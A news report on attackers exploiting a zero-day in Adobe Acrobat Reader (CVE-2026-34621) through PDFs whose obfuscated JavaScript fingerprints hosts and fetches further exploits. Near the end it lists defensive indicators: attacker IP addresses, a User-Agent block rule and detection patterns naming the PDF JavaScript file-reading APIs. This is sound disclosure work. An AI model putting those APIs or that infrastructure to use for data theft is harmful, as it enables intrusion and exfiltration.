Security researcher Haifei Li has uncovered that unidentified attackers have been exploiting a zero-day vulnerability in Adobe Acrobat Reader since November 2025, and potentially even earlier.
Exploits embedded in PDF files
Li, who is among the developers of EXPMON, a cybersecurity tool that identifies sophisticated file-based exploits by examining suspicious files through its public web interface or API, shared insights about the issue.
“Just a few weeks ago, on March 26, an individual submitted a PDF file to EXPMON, which was named ‘yummy_adobe_exploit_uwu.pdf’ by the anonymous submitter. This file activated one of EXPMON’s advanced detection features,” Li explained in a post released on Tuesday.
The same PDF had been submitted earlier to VirusTotal, according to Li. Another security researcher noted a variant of the file on VirusTotal, which was first submitted on November 28, 2025.
Upon examining the initial PDF, Li found that when opened, it attempts to run heavily obfuscated JavaScript code contained within the file.
This script gathers various details from the host system, including language settings, operating system version, Adobe Reader version number, and the local path of the PDF. It then transmits this information to a remote server controlled by the attacker.
Additionally, the script is capable of retrieving and executing further remote code execution or sandbox escape exploits from the attacker’s server. Unfortunately, during his analysis, Li found that the server did not deliver any exploits.
“This could result from various factors, such as the attacker’s server blocking my IP address, or it may require specific local information to meet the server's conditions. This resembles a sophisticated fingerprinting attack,” he noted.
Testing confirmed that the remote server is capable of delivering and executing additional exploits (Source: Haifei Li)
Malware analyst Giuseppe Massaro examined both PDF samples and observed that they feature Russian-language documents presented as images, serving as visual decoys. The content, which relates to gas supply disruptions and emergency responses, indicates that the attackers likely targeted Russian-speaking individuals, particularly in government, energy, or infrastructure sectors.
Recommended precautions until a fix is available
Li stated that the malicious PDF files will activate the exploit upon being opened, confirming that it works with the latest version of Acrobat.
He has informed Adobe about his findings, but the company has not yet released security updates to address the vulnerability.
In the interim, users are advised to refrain from opening PDF files sent by unknown sources. Security teams can block the IP addresses of the two attacker-controlled servers, 169.40.2.68 and 188.214.34.20. Ideally, they should also block all HTTP/HTTPS traffic containing the “Adobe Synchronizer” string in the User Agent field, as suggested by Li.
Massaro recommended that security teams keep an eye on specific changes or actions occurring on endpoints, such as AdobeCollabSync.exe making external network connections, and PDF JavaScript invoking the RSS.addFeed() or util.readFileIntoStream() APIs.
We have contacted Adobe for further details and will update this article upon receiving a response from them.
UPDATE (April 12, 2026, 04:20 a.m. ET):
Adobe has assigned CVE-2026-34621 to the identified vulnerability and has issued security updates for Acrobat DC, Acrobat Reader DC, and Acrobat 2024, applicable to both Windows and macOS.
“Successful exploitation of this issue could lead to arbitrary code execution,” the company confirmed.
